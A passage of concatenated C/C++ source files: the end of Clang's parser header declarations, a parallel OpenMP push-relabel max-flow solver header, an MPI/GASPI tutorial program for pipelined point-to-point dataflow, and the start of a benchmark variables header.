SmallVectorImpl<DeclaratorChunk::ParamInfo> &ParamInfo);
void ParseParameterDeclarationClause(
Declarator &D,
ParsedAttributes &attrs,
SmallVectorImpl<DeclaratorChunk::ParamInfo> &ParamInfo,
SourceLocation &EllipsisLoc);
void ParseBracketDeclarator(Declarator &D);
void ParseMisplacedBracketDeclarator(Declarator &D);
//===--------------------------------------------------------------------===//
// C++ 7: Declarations [dcl.dcl]
/// The kind of attribute specifier we have found.
enum CXX11AttributeKind {
/// This is not an attribute specifier.
CAK_NotAttributeSpecifier,
/// This should be treated as an attribute-specifier.
CAK_AttributeSpecifier,
/// The next tokens are '[[', but this is not an attribute-specifier. This
/// is ill-formed by C++11 [dcl.attr.grammar]p6.
CAK_InvalidAttributeSpecifier
};
CXX11AttributeKind
isCXX11AttributeSpecifier(bool Disambiguate = false,
bool OuterMightBeMessageSend = false);
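// Example of the ambiguity: in Objective-C++ a statement may begin with a
// nested message send such as '[[obj method] otherMethod]', so a leading
// '[[' is not necessarily an attribute-specifier; callers in that position
// pass OuterMightBeMessageSend = true.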
void DiagnoseUnexpectedNamespace(NamedDecl *Context);
DeclGroupPtrTy ParseNamespace(unsigned Context, SourceLocation &DeclEnd,
SourceLocation InlineLoc = SourceLocation());
void ParseInnerNamespace(std::vector<SourceLocation>& IdentLoc,
std::vector<IdentifierInfo*>& Ident,
std::vector<SourceLocation>& NamespaceLoc,
unsigned int index, SourceLocation& InlineLoc,
ParsedAttributes& attrs,
BalancedDelimiterTracker &Tracker);
Decl *ParseLinkage(ParsingDeclSpec &DS, unsigned Context);
Decl *ParseExportDeclaration();
DeclGroupPtrTy ParseUsingDirectiveOrDeclaration(
unsigned Context, const ParsedTemplateInfo &TemplateInfo,
SourceLocation &DeclEnd, ParsedAttributesWithRange &attrs);
Decl *ParseUsingDirective(unsigned Context,
SourceLocation UsingLoc,
SourceLocation &DeclEnd,
ParsedAttributes &attrs);
struct UsingDeclarator {
SourceLocation TypenameLoc;
CXXScopeSpec SS;
SourceLocation TemplateKWLoc;
UnqualifiedId Name;
SourceLocation EllipsisLoc;
void clear() {
TypenameLoc = TemplateKWLoc = EllipsisLoc = SourceLocation();
SS.clear();
Name.clear();
}
};
bool ParseUsingDeclarator(unsigned Context, UsingDeclarator &D);
DeclGroupPtrTy ParseUsingDeclaration(unsigned Context,
const ParsedTemplateInfo &TemplateInfo,
SourceLocation UsingLoc,
SourceLocation &DeclEnd,
AccessSpecifier AS = AS_none);
Decl *ParseAliasDeclarationAfterDeclarator(
const ParsedTemplateInfo &TemplateInfo, SourceLocation UsingLoc,
UsingDeclarator &D, SourceLocation &DeclEnd, AccessSpecifier AS,
ParsedAttributes &Attrs, Decl **OwnedType = nullptr);
Decl *ParseStaticAssertDeclaration(SourceLocation &DeclEnd);
Decl *ParseNamespaceAlias(SourceLocation NamespaceLoc,
SourceLocation AliasLoc, IdentifierInfo *Alias,
SourceLocation &DeclEnd);
//===--------------------------------------------------------------------===//
// C++ 9: classes [class] and C structs/unions.
bool isValidAfterTypeSpecifier(bool CouldBeBitfield);
void ParseClassSpecifier(tok::TokenKind TagTokKind, SourceLocation TagLoc,
DeclSpec &DS, const ParsedTemplateInfo &TemplateInfo,
AccessSpecifier AS, bool EnteringContext,
DeclSpecContext DSC,
ParsedAttributesWithRange &Attributes);
void SkipCXXMemberSpecification(SourceLocation StartLoc,
SourceLocation AttrFixitLoc,
unsigned TagType,
Decl *TagDecl);
void ParseCXXMemberSpecification(SourceLocation StartLoc,
SourceLocation AttrFixitLoc,
ParsedAttributesWithRange &Attrs,
unsigned TagType,
Decl *TagDecl);
ExprResult ParseCXXMemberInitializer(Decl *D, bool IsFunction,
SourceLocation &EqualLoc);
bool ParseCXXMemberDeclaratorBeforeInitializer(Declarator &DeclaratorInfo,
VirtSpecifiers &VS,
ExprResult &BitfieldSize,
LateParsedAttrList &LateAttrs);
void MaybeParseAndDiagnoseDeclSpecAfterCXX11VirtSpecifierSeq(Declarator &D,
VirtSpecifiers &VS);
DeclGroupPtrTy ParseCXXClassMemberDeclaration(
AccessSpecifier AS, AttributeList *Attr,
const ParsedTemplateInfo &TemplateInfo = ParsedTemplateInfo(),
ParsingDeclRAIIObject *DiagsFromTParams = nullptr);
DeclGroupPtrTy ParseCXXClassMemberDeclarationWithPragmas(
AccessSpecifier &AS, ParsedAttributesWithRange &AccessAttrs,
DeclSpec::TST TagType, Decl *Tag);
void ParseConstructorInitializer(Decl *ConstructorDecl);
MemInitResult ParseMemInitializer(Decl *ConstructorDecl);
void HandleMemberFunctionDeclDelays(Declarator& DeclaratorInfo,
Decl *ThisDecl);
//===--------------------------------------------------------------------===//
// C++ 10: Derived classes [class.derived]
TypeResult ParseBaseTypeSpecifier(SourceLocation &BaseLoc,
SourceLocation &EndLocation);
void ParseBaseClause(Decl *ClassDecl);
BaseResult ParseBaseSpecifier(Decl *ClassDecl);
AccessSpecifier getAccessSpecifierIfPresent() const;
bool ParseUnqualifiedIdTemplateId(CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
IdentifierInfo *Name,
SourceLocation NameLoc,
bool EnteringContext,
ParsedType ObjectType,
UnqualifiedId &Id,
bool AssumeTemplateId);
bool ParseUnqualifiedIdOperator(CXXScopeSpec &SS, bool EnteringContext,
ParsedType ObjectType,
UnqualifiedId &Result);
//===--------------------------------------------------------------------===//
// OpenMP: Directives and clauses.
/// Parse clauses for '#pragma omp declare simd'.
DeclGroupPtrTy ParseOMPDeclareSimdClauses(DeclGroupPtrTy Ptr,
CachedTokens &Toks,
SourceLocation Loc);
/// \brief Parses declarative OpenMP directives.
DeclGroupPtrTy ParseOpenMPDeclarativeDirectiveWithExtDecl(
AccessSpecifier &AS, ParsedAttributesWithRange &Attrs,
DeclSpec::TST TagType = DeclSpec::TST_unspecified,
Decl *TagDecl = nullptr);
/// \brief Parse 'omp declare reduction' construct.
DeclGroupPtrTy ParseOpenMPDeclareReductionDirective(AccessSpecifier AS);
/// \brief Parses simple list of variables.
///
/// \param Kind Kind of the directive.
/// \param Callback Callback function to be called for the list elements.
/// \param AllowScopeSpecifier true, if the variables can have fully
/// qualified names.
///
bool ParseOpenMPSimpleVarList(
OpenMPDirectiveKind Kind,
const llvm::function_ref<void(CXXScopeSpec &, DeclarationNameInfo)> &
Callback,
bool AllowScopeSpecifier);
/// \brief Parses declarative or executable directive.
///
/// \param Allowed ACK_Any, if any directives are allowed,
/// ACK_StatementsOpenMPAnyExecutable - if any executable directives are
/// allowed, ACK_StatementsOpenMPNonStandalone - if only non-standalone
/// executable directives are allowed.
///
StmtResult
ParseOpenMPDeclarativeOrExecutableDirective(AllowedContsructsKind Allowed);
/// \brief Parses clause of kind \a CKind for directive of a kind \a Kind.
///
/// \param DKind Kind of current directive.
/// \param CKind Kind of current clause.
/// \param FirstClause true, if this is the first clause of a kind \a CKind
/// in current directive.
///
OMPClause *ParseOpenMPClause(OpenMPDirectiveKind DKind,
OpenMPClauseKind CKind, bool FirstClause);
/// \brief Parses clause with a single expression of a kind \a Kind.
///
/// \param Kind Kind of current clause.
///
OMPClause *ParseOpenMPSingleExprClause(OpenMPClauseKind Kind);
/// \brief Parses simple clause of a kind \a Kind.
///
/// \param Kind Kind of current clause.
///
OMPClause *ParseOpenMPSimpleClause(OpenMPClauseKind Kind);
/// \brief Parses clause with a single expression and an additional argument
/// of a kind \a Kind.
///
/// \param Kind Kind of current clause.
///
OMPClause *ParseOpenMPSingleExprWithArgClause(OpenMPClauseKind Kind);
/// \brief Parses clause without any additional arguments.
///
/// \param Kind Kind of current clause.
///
OMPClause *ParseOpenMPClause(OpenMPClauseKind Kind);
/// \brief Parses clause with the list of variables of a kind \a Kind.
///
/// \param Kind Kind of current clause.
///
OMPClause *ParseOpenMPVarListClause(OpenMPDirectiveKind DKind,
OpenMPClauseKind Kind);
public:
/// Parses simple expression in parens for single-expression clauses of OpenMP
/// constructs.
/// \param RLoc Returned location of right paren.
ExprResult ParseOpenMPParensExpr(StringRef ClauseName, SourceLocation &RLoc);
/// Data used for parsing list of variables in OpenMP clauses.
struct OpenMPVarListDataTy {
Expr *TailExpr = nullptr;
SourceLocation ColonLoc;
CXXScopeSpec ReductionIdScopeSpec;
DeclarationNameInfo ReductionId;
OpenMPDependClauseKind DepKind = OMPC_DEPEND_unknown;
OpenMPLinearClauseKind LinKind = OMPC_LINEAR_val;
OpenMPMapClauseKind MapTypeModifier = OMPC_MAP_unknown;
OpenMPMapClauseKind MapType = OMPC_MAP_unknown;
bool IsMapTypeImplicit = false;
SourceLocation DepLinMapLoc;
};
/// Parses clauses with list.
bool ParseOpenMPVarList(OpenMPDirectiveKind DKind, OpenMPClauseKind Kind,
SmallVectorImpl<Expr *> &Vars,
OpenMPVarListDataTy &Data);
bool ParseUnqualifiedId(CXXScopeSpec &SS, bool EnteringContext,
bool AllowDestructorName,
bool AllowConstructorName,
ParsedType ObjectType,
SourceLocation& TemplateKWLoc,
UnqualifiedId &Result);
private:
//===--------------------------------------------------------------------===//
// C++ 14: Templates [temp]
// C++ 14.1: Template Parameters [temp.param]
Decl *ParseDeclarationStartingWithTemplate(unsigned Context,
SourceLocation &DeclEnd,
AccessSpecifier AS = AS_none,
AttributeList *AccessAttrs = nullptr);
Decl *ParseTemplateDeclarationOrSpecialization(unsigned Context,
SourceLocation &DeclEnd,
AccessSpecifier AS,
AttributeList *AccessAttrs);
Decl *ParseSingleDeclarationAfterTemplate(
unsigned Context,
const ParsedTemplateInfo &TemplateInfo,
ParsingDeclRAIIObject &DiagsFromParams,
SourceLocation &DeclEnd,
AccessSpecifier AS=AS_none,
AttributeList *AccessAttrs = nullptr);
bool ParseTemplateParameters(unsigned Depth,
SmallVectorImpl<Decl*> &TemplateParams,
SourceLocation &LAngleLoc,
SourceLocation &RAngleLoc);
bool ParseTemplateParameterList(unsigned Depth,
SmallVectorImpl<Decl*> &TemplateParams);
bool isStartOfTemplateTypeParameter();
Decl *ParseTemplateParameter(unsigned Depth, unsigned Position);
Decl *ParseTypeParameter(unsigned Depth, unsigned Position);
Decl *ParseTemplateTemplateParameter(unsigned Depth, unsigned Position);
Decl *ParseNonTypeTemplateParameter(unsigned Depth, unsigned Position);
void DiagnoseMisplacedEllipsis(SourceLocation EllipsisLoc,
SourceLocation CorrectLoc,
bool AlreadyHasEllipsis,
bool IdentifierHasName);
void DiagnoseMisplacedEllipsisInDeclarator(SourceLocation EllipsisLoc,
Declarator &D);
// C++ 14.3: Template arguments [temp.arg]
typedef SmallVector<ParsedTemplateArgument, 16> TemplateArgList;
bool ParseGreaterThanInTemplateList(SourceLocation &RAngleLoc,
bool ConsumeLastToken,
bool ObjCGenericList);
bool ParseTemplateIdAfterTemplateName(TemplateTy Template,
SourceLocation TemplateNameLoc,
const CXXScopeSpec &SS,
bool ConsumeLastToken,
SourceLocation &LAngleLoc,
TemplateArgList &TemplateArgs,
SourceLocation &RAngleLoc);
bool AnnotateTemplateIdToken(TemplateTy Template, TemplateNameKind TNK,
CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
UnqualifiedId &TemplateName,
bool AllowTypeAnnotation = true);
void AnnotateTemplateIdTokenAsType();
bool IsTemplateArgumentList(unsigned Skip = 0);
bool ParseTemplateArgumentList(TemplateArgList &TemplateArgs);
ParsedTemplateArgument ParseTemplateTemplateArgument();
ParsedTemplateArgument ParseTemplateArgument();
Decl *ParseExplicitInstantiation(unsigned Context,
SourceLocation ExternLoc,
SourceLocation TemplateLoc,
SourceLocation &DeclEnd,
AccessSpecifier AS = AS_none);
//===--------------------------------------------------------------------===//
// Modules
DeclGroupPtrTy ParseModuleDecl();
DeclGroupPtrTy ParseModuleImport(SourceLocation AtLoc);
bool parseMisplacedModuleImport();
bool tryParseMisplacedModuleImport() {
tok::TokenKind Kind = Tok.getKind();
if (Kind == tok::annot_module_begin || Kind == tok::annot_module_end ||
Kind == tok::annot_module_include)
return parseMisplacedModuleImport();
return false;
}
bool ParseModuleName(
SourceLocation UseLoc,
SmallVectorImpl<std::pair<IdentifierInfo *, SourceLocation>> &Path,
bool IsImport);
//===--------------------------------------------------------------------===//
// C++11/G++: Type Traits [Type-Traits.html in the GCC manual]
ExprResult ParseTypeTrait();
//===--------------------------------------------------------------------===//
// Embarcadero: Array and Expression Traits
ExprResult ParseArrayTypeTrait();
ExprResult ParseExpressionTrait();
//===--------------------------------------------------------------------===//
// Preprocessor code-completion pass-through
void CodeCompleteDirective(bool InConditional) override;
void CodeCompleteInConditionalExclusion() override;
void CodeCompleteMacroName(bool IsDefinition) override;
void CodeCompletePreprocessorExpression() override;
void CodeCompleteMacroArgument(IdentifierInfo *Macro, MacroInfo *MacroInfo,
unsigned ArgumentIndex) override;
void CodeCompleteNaturalLanguage() override;
};
} // end namespace clang
#endif
|
push_relabel_segment.h | //
// Created by Jan Groschaft on 2/1/19.
//
/*
* Parallel implementation of push-relabel algorithm, divides the network into multiple segments.
*/
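/*
 * Usage sketch (assumptions: a vector template taking a single type
 * parameter, and a residual network already built as adjacency lists of
 * cached_edge<T, U>; 'my_vector' and 'network' are placeholders, not part
 * of this header):
 *
 *   push_relabel_segment::max_flow_instance<my_vector, uint32_t, uint64_t>
 *       solver ( std::move ( network ), source, sink );
 *   auto max_flow = solver . find_max_flow ();
 *   solver . preflow_to_flow (); // optionally convert the preflow to a flow
 */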
#ifndef MAXFLOW_GOLDBERG_CR_H
#define MAXFLOW_GOLDBERG_CR_H
#include "../../common_types.h"
#include "../../data_structures/linked_list.h"
#include "../../data_structures/thread_local_buffer_pool.h"
#include "partitioning.h"
#include <memory>
#include <cassert>
#include <chrono>
#include <cstring>
#include <omp.h>
#include <algorithm>
#include <atomic>
#include <set>
#ifdef DEBUG
#include <iostream> // std::cerr is used by the DEBUG excess check below
#endif
#ifndef CACHE_LINE_SIZE
#define CACHE_LINE_SIZE 64
#endif
namespace push_relabel_segment
{
template <template <class> typename vector, typename T, typename U>
class max_flow_instance
{
struct alignas (CACHE_LINE_SIZE) vertex
{
vertex * next = nullptr;
vertex * prev = nullptr;
U excess { 0 };
T label;
T original_label;
std::atomic_flag discovered = ATOMIC_FLAG_INIT;
};
struct label_info
{
data_structures::linked_list<vertex> active_vertices { };
data_structures::linked_list<vertex> inactive_vertices { };
void reset ( ) noexcept
{
active_vertices . clear ();
inactive_vertices . clear ();
}
};
vector<vector<cached_edge<T, U>>> _residual_network;
std::unique_ptr<label_info[]> _labels;
std::unique_ptr<vertex[]> _vertices;
data_structures::thread_local_buffer_pool<T> _pool;
std::unique_ptr<T[]> _q;
std::unique_ptr<label_info[]> _thread_local_labels;
T _source, _sink, _highest_active { 0 }, _highest_vertex { 0 };
std::size_t _thread_count, _original_relabel_threshold { 0 };
const std::size_t _max_thread_count;
int64_t _min_cpu_time_per_phase { 0 };
std::atomic<std::size_t> _relabel_threshold { 0 };
public:
max_flow_instance ( vector<vector<cached_edge<T, U>>> graph, T source, T sink,
std::size_t thread_count = static_cast<size_t>(omp_get_max_threads ()) )
:
_residual_network ( std::move ( graph ) ),
_labels ( std::make_unique<label_info[]> ( _residual_network . size () + 1 ) ),
_vertices ( std::make_unique<vertex[]> ( _residual_network . size () ) ),
_pool ( data_structures::thread_local_buffer_pool<T> { thread_count, _residual_network . size () } ),
_q ( std::make_unique<T[]> ( _residual_network . size () ) ),
_thread_local_labels ( std::make_unique<label_info[]> ( thread_count ) ),
_source ( source ), _sink ( sink ), _thread_count ( thread_count ),
_max_thread_count ( thread_count )
{
omp_set_num_threads ( static_cast<int> ( _max_thread_count ) );
init ();
}
U find_max_flow ( )
{
global_relabel ();
while ( _highest_active != 0 )
{
parallel_phase ();
global_relabel ();
}
return _vertices[_sink] . excess;
}
void preflow_to_flow ( )
{
std::swap ( _source, _sink );
_highest_vertex = _residual_network . size ();
find_max_flow ();
std::swap ( _source, _sink );
#ifdef DEBUG
for ( std::size_t i = 0; i < _residual_network . size(); ++i )
if ( i != _source && i != _sink )
if ( _vertices[i] . excess > 0 )
std::cerr << "Excess violation: vertex " << i << ", excess " << _vertices[i] . excess << '\n';
#endif
}
auto steal_network ( )
{
return std::move ( _residual_network );
}
private:
static constexpr T ALPHA = 6, BETA = 12;
static constexpr double GLOBAL_RELABEL_FREQ = 1;
static constexpr T min_active_per_thread = 10;
void init ( ) noexcept
{
#pragma omp parallel for schedule(static)
for ( std::size_t i = 0; i < _residual_network[_source] . size (); ++i )
{
auto & edge = _residual_network[_source][i];
_vertices[edge . dst_vertex] . excess = edge . r_capacity;
edge . reverse_r_capacity += edge . r_capacity;
_residual_network[edge . dst_vertex][edge . reverse_edge_index] . r_capacity += edge . r_capacity;
_residual_network[edge . dst_vertex][edge . reverse_edge_index] . reverse_r_capacity -= edge . r_capacity;
edge . r_capacity = 0;
}
std::size_t m = 0;
for ( std::size_t i = 0; i < _residual_network . size (); ++i )
m += _residual_network[i] . size ();
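// global relabel trigger: roughly n*ALPHA + m/2 units of relabel work,
// the usual threshold in hi_pr-style push-relabel implementations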
_original_relabel_threshold = ( _residual_network . size () * ALPHA + m / 2 );
}
struct thread_local_data
{
int64_t & cpu_time;
const T low;
const T high;
T & highest_active;
T & highest_vertex;
T relabel_progress;
};
void parallel_phase ( )
{
for ( ;; )
{
_relabel_threshold = _original_relabel_threshold;
const auto partitions = partitioning::get_partitions ( _labels, _highest_active, _thread_count, min_active_per_thread );
const auto actual_thread_cnt = partitions . size () - 1;
omp_set_num_threads ( static_cast<int> ( actual_thread_cnt ) );
int64_t cpu_time = 0;
if ( actual_thread_cnt == 1 )
{
push_relabel ( thread_local_data { cpu_time, 0, static_cast<T> ( _residual_network . size () ),
_highest_active, _highest_vertex, 0 } );
_thread_count = std::min ( _thread_count * 2, _max_thread_count );
return;
}
T highest_active = 0, highest_vertex = 0;
#pragma omp parallel for schedule(static) reduction(+:cpu_time) reduction(max:highest_active) reduction(max:highest_vertex)
for ( std::size_t i = 0; i < actual_thread_cnt; ++i )
{
T low = partitions[i], high = partitions[i + 1];
highest_active = highest_vertex = high - 1;
push_relabel ( thread_local_data { cpu_time, low, high, highest_active, highest_vertex, 0 } );
_relabel_threshold -= _original_relabel_threshold / actual_thread_cnt;
// add back vertices that are still active but could not be relabeled into a higher partition
_labels[high - 1] . active_vertices . append_list ( _thread_local_labels[omp_get_thread_num ()] . active_vertices );
if ( !_labels[high - 1] . active_vertices . empty () )
highest_active = highest_vertex = high - 1;
}
_highest_active = highest_active;
_highest_vertex = std::max ( _highest_vertex, highest_vertex );
if ( cpu_time > _min_cpu_time_per_phase )
{
_thread_count = std::min ( _thread_count * 2, _max_thread_count );
return;
}
_thread_count = std::max ( actual_thread_cnt / 2, std::size_t { 1 } );
omp_set_num_threads ( static_cast<int> ( _max_thread_count ) );
#pragma omp parallel for schedule(static)
for ( std::size_t i = 0; i < _residual_network . size (); ++i )
_vertices[i] . original_label = _vertices[i] . label;
}
}
void push_relabel ( thread_local_data data ) noexcept
{
auto start = std::chrono::high_resolution_clock::now ();
for ( ;; )
{
auto node = get_active_vertex ( data . highest_active, data . low );
auto label = data . highest_active;
if ( node == nullptr )
break;
discharge ( node, label, data );
if ( data . relabel_progress * GLOBAL_RELABEL_FREQ >=
_relabel_threshold . load ( std::memory_order_relaxed ) )
{
break;
}
}
auto end = std::chrono::high_resolution_clock::now ();
data . cpu_time += std::chrono::duration_cast<std::chrono::milliseconds> ( end - start ) . count ();
}
inline auto get_active_vertex ( T & highest_active, const T low ) noexcept
{
for ( T i = 0; i < highest_active - low; ++i ) // skip label low: discharging there would push outside this segment
{
if ( _labels[highest_active - i] . active_vertices . empty () )
continue;
auto * node = _labels[highest_active - i] . active_vertices . pop ();
highest_active -= i;
return node;
}
return static_cast<vertex *> (nullptr);
}
inline T get_vertex_idx ( vertex * n ) const noexcept
{
return std::distance ( _vertices . get (), n );
}
inline void discharge ( vertex * v, T label, thread_local_data & data ) noexcept
{
T vertex = get_vertex_idx ( v );
for ( ;; )
{
if ( push ( vertex, label, data ) )
{
_labels[label] . inactive_vertices . push ( v );
return;
}
label = relabel ( vertex, label, data );
if ( label >= data . high )
return;
}
}
//original labels have to be set before the parallel phase starts and they don't change until the next one
inline bool same_thread ( const T original_label, const T low, const T high ) const noexcept
{
return original_label >= low && original_label < high;
}
inline bool push ( const T vertex, const T label, const thread_local_data & data ) noexcept
{
const auto target_label = label - 1;
for ( auto & edge : _residual_network[vertex] )
{
if ( edge . r_capacity > 0 &&
same_thread ( _vertices[edge . dst_vertex] . original_label, data . low, data . high )
&& _vertices[edge . dst_vertex] . label == target_label )
{
auto flow = std::min ( _vertices[vertex] . excess, edge . r_capacity );
if ( _vertices[edge . dst_vertex] . excess == 0 && edge . dst_vertex != _sink )
{
auto * node = &_vertices[edge . dst_vertex];
_labels[target_label] . inactive_vertices . remove ( node );
_labels[target_label] . active_vertices . push ( node );
}
_vertices[vertex] . excess -= flow;
_vertices[edge . dst_vertex] . excess += flow;
edge . r_capacity -= flow;
edge . reverse_r_capacity += flow;
_residual_network[edge . dst_vertex][edge . reverse_edge_index] . reverse_r_capacity -= flow;
_residual_network[edge . dst_vertex][edge . reverse_edge_index] . r_capacity += flow;
if ( _vertices[vertex] . excess == 0 )
return true;
}
}
return false;
}
inline T relabel ( const T vertex, const T current_label, thread_local_data & data ) noexcept
{
data . relabel_progress += BETA;
const auto new_label = calculate_new_label ( vertex, data );
_vertices[vertex] . label = std::min ( new_label, data . high - 1 );
if ( new_label < data . high )
{
data . highest_vertex = std::max ( data . highest_vertex, new_label );
data . highest_active = new_label - 1;
} else if ( data . high != _residual_network . size () )
//vertex is still active, but we cannot relabel it to another partition, so we remember it and add it back to active vertices at the end of this phase
_thread_local_labels[omp_get_thread_num ()] . active_vertices . push ( &_vertices[vertex] );
if ( _labels[current_label] . active_vertices . empty () &&
_labels[current_label] . inactive_vertices . empty () &&
current_label != data . high - 1 )
{
gap_relabel ( current_label, data );
_vertices[vertex] . label = _residual_network . size ();
}
return new_label;
}
inline T calculate_new_label ( const T vertex, thread_local_data & data ) noexcept
{
T increase_to = data . high - 1;
for ( auto & edge : _residual_network[vertex] )
{
if ( edge . r_capacity == 0 ||
!same_thread ( _vertices[edge . dst_vertex] . original_label, data . low, data . high ) )
continue;
increase_to = std::min ( increase_to, _vertices[edge . dst_vertex] . label );
}
data . relabel_progress += _residual_network[vertex] . size ();
return increase_to + 1;
}
void global_relabel ( ) noexcept
{
auto start = std::chrono::high_resolution_clock::now ();
omp_set_num_threads ( static_cast<int> ( _max_thread_count ) );
const auto not_reached = _residual_network . size ();
#pragma omp parallel for schedule(static)
for ( std::size_t i = 0; i < _residual_network . size (); ++i )
{
_vertices[i] . discovered . clear ( std::memory_order_relaxed );
_vertices[i] . label = _vertices[i] . original_label = not_reached;
}
#pragma omp parallel for schedule(static)
for ( std::size_t i = 0; i <= _highest_vertex; ++i )
_labels[i] . reset ();
_vertices[_sink] . label = _vertices[_sink] . original_label = 0;
_vertices[_sink] . discovered . test_and_set ( std::memory_order_relaxed );
_highest_active = 0;
_q[0] = _sink;
std::size_t current_queue_size = 1;
T current_distance = 0;
while ( current_queue_size > 0 )
{
#pragma omp parallel for schedule(static)
for ( std::size_t i = 0; i < current_queue_size; ++i )
{
auto thr_id = omp_get_thread_num ();
auto current_vertex = _q[i];
for ( auto edge : _residual_network[current_vertex] )
{
if ( edge . reverse_r_capacity > 0 )
{
if ( !_vertices[edge . dst_vertex] . discovered . test_and_set ( std::memory_order_relaxed ) )
{
_vertices[edge . dst_vertex] . label = current_distance + 1;
_vertices[edge . dst_vertex] . original_label = current_distance + 1;
_pool . push_back ( edge . dst_vertex, static_cast<std::size_t>(thr_id) );
auto * node = &_vertices[edge . dst_vertex];
if ( _vertices[edge . dst_vertex] . excess > 0 )
_thread_local_labels[thr_id] . active_vertices . push ( node );
else
_thread_local_labels[thr_id] . inactive_vertices . push ( node );
}
}
}
}
current_queue_size = _pool . swap_data ( _q );
++current_distance;
for ( std::size_t i = 0; i < _max_thread_count; ++i ) //append together all thread_local info
{
_labels[current_distance] . active_vertices . append_list ( _thread_local_labels[i] . active_vertices );
_labels[current_distance] . inactive_vertices . append_list (
_thread_local_labels[i] . inactive_vertices );
}
if ( !_labels[current_distance] . active_vertices . empty () )
_highest_active = current_distance;
}
_highest_vertex = current_distance - 1;
omp_set_num_threads ( static_cast<int> ( _thread_count ) );
auto end = std::chrono::high_resolution_clock::now ();
_min_cpu_time_per_phase = std::chrono::duration_cast<std::chrono::milliseconds> ( end - start ) . count ();
}
//gap heuristic restricted to single segment
void gap_relabel ( const T gap_height, const thread_local_data & data ) noexcept
{
for ( auto current_height = gap_height + 1; current_height <= data . highest_vertex; ++current_height )
{
while ( !_labels[current_height] . active_vertices . empty () )
{
auto * ptr = _labels[current_height] . active_vertices . pop ();
auto vertex_idx = get_vertex_idx ( ptr );
_vertices[vertex_idx] . label = _residual_network . size ();
}
while ( !_labels[current_height] . inactive_vertices . empty () )
{
auto * ptr = _labels[current_height] . inactive_vertices . pop ();
auto vertex_idx = get_vertex_idx ( ptr );
_vertices[vertex_idx] . label = _residual_network . size ();
}
}
data . highest_vertex = data . highest_active = std::max ( gap_height - 1, data . low );
}
};
}
#endif //MAXFLOW_GOLDBERG_CR_H
|
right_synch_p2p_dataflow.c | /*
* This file is part of a small series of tutorial,
* which aims to demonstrate key features of the GASPI
* standard by means of small but expandable examples.
* Conceptually the tutorial follows a MPI course
* developed by EPCC and HLRS.
*
* Contact point for the MPI tutorial:
* rabenseifner@hlrs.de
* Contact point for the GASPI tutorial:
* daniel.gruenewald@itwm.fraunhofer.de
* mirko.rahn@itwm.fraunhofer.de
* christian.simmendinger@t-systems.com
*/
#include "assert.h"
#include "constant.h"
#include "data.h"
#include "topology.h"
#include "now.h"
#include "mm_pause.h"
#include <malloc.h>
#include <stdlib.h>
#include <mpi.h>
#include <stdio.h>
#include <omp.h>
/* global stage counters for comp */
static volatile counter_t *compStage = NULL;
#define MIN(x,y) ((x)<(y)?(x):(y))
int main (int argc, char *argv[])
{
int i, j;
int nProc, iProc;
int provided, required = MPI_THREAD_MULTIPLE;
MPI_Init_thread(&argc, &argv, required, &provided);
ASSERT(provided == MPI_THREAD_MULTIPLE); /* check the level actually provided, not the request */
MPI_Comm_rank (MPI_COMM_WORLD, &iProc);
MPI_Comm_size (MPI_COMM_WORLD, &nProc);
// num threads
omp_set_num_threads(nThreads);
// global stage counter
compStage = malloc(nThreads * sizeof(counter_t));
// left, right neighbour (proc)
const int left = LEFT(iProc);
const int right = RIGHT(iProc);
// assignment per proc, i-direction
#ifdef USE_STRONG_SCALING
int mSize = M_SZ/nProc;
if (M_SZ % nProc != 0)
{
mSize++;
}
const int mStart = iProc*mSize + 1;
const int mStop = MIN((iProc+1)*mSize, M_SZ);
mSize = mStop-mStart+1;
#else
int mSize = M_SZ;
const int mStart = iProc*mSize + 1;
const int mStop = MIN((iProc+1)*mSize, M_SZ*nProc);
mSize = mStop-mStart+1;
#endif
// align local array
const int CL_SZ = ((mSize+1) % CL) == 0 ? (mSize+1) : CL*(1+(mSize+1)/CL);
double *array = memalign(CL* sizeof (double), CL_SZ * (nThreads+1) * (K_SZ+1) * sizeof (double));
ASSERT (array != NULL);
#pragma omp parallel default (none) shared(compStage, CL_SZ, \
mSize, array, stdout, stderr)
{
int const tid = omp_get_thread_num();
compStage[tid].global = 0;
// initialize data
data_init_tlocal(mSize, tid, array, CL_SZ);
}
data_init_global(mStart, mSize, iProc, array, CL_SZ);
int iter;
double median[NITER];
for (iter = 0; iter < NITER; iter++)
{
double time = -now();
MPI_Barrier(MPI_COMM_WORLD);
#pragma omp parallel default (none) shared(mStart, mSize, \
compStage, nThreads, iProc, nProc, stdout, stderr, array, CL_SZ)
{
int const tid = omp_get_thread_num();
MPI_Status status;
int k;
for (k = 1; k <= K_SZ; k++)
{
if (left >= 0 )
{
MPI_Recv ( &array_ELEM (0, tid+1, k)
, 1
, MPI_DOUBLE
, left
, (k-1)*nThreads+tid
, MPI_COMM_WORLD
, &status
);
}
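/* pipeline handshake: thread tid may start stage k only after thread
   tid-1 has advanced past tid's own stage counter, i.e. the boundary
   row this stage depends on has already been written */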
if(tid > 0)
{
volatile int it;
while((it = compStage[tid-1].global) <= compStage[tid].global)
{
_mm_pause();
}
}
// compute
data_compute (mStart, mSize, tid, k, array, CL_SZ);
/* increase stage counter */
compStage[tid].global++;
// issue send
if (right <= nProc - 1)
{
MPI_Send ( &array_ELEM (mSize, tid+1, k)
, 1
, MPI_DOUBLE
, right
, (k-1)*nThreads+tid
, MPI_COMM_WORLD
);
}
#ifdef USE_OMP_BARRIER
#pragma omp barrier
#endif
}
}
MPI_Barrier(MPI_COMM_WORLD);
time += now();
/* iteration time */
median[iter] = time;
}
MPI_Barrier(MPI_COMM_WORLD);
// validate
#pragma omp parallel default (none) shared(mStart, array, CL_SZ, mSize)
{
int const tid = omp_get_thread_num();
data_validate (mStart, mSize, tid, K_SZ, array, CL_SZ);
}
MPI_Barrier(MPI_COMM_WORLD);
sort_median(&median[0], &median[NITER-1]);
printf ("# mpi %s nProc: %d nThreads: %d M_SZ: %d K_SZ: %d niter: %d time: %g\n"
, argv[0], nProc, nThreads, M_SZ, K_SZ, NITER, median[(NITER-1)/2]
);
if (iProc == nProc-1)
{
double res = 1.0E-06 * 4 * mSize*nThreads*K_SZ*nProc / median[(NITER-1)/2];
printf("\nRate (MFlops/s): %lf\n",res);
}
free(array);
MPI_Finalize();
return EXIT_SUCCESS;
}
|
pf3dbenchvars.h | #include "mytypes.h"
/* Storage for these variables needs to be allocated ONCE
on the host. In the file responsible for allocating
storage, define __parm_init__. */
#ifdef __parm_init__
#define EXTERN
#else
#define EXTERN extern
#endif
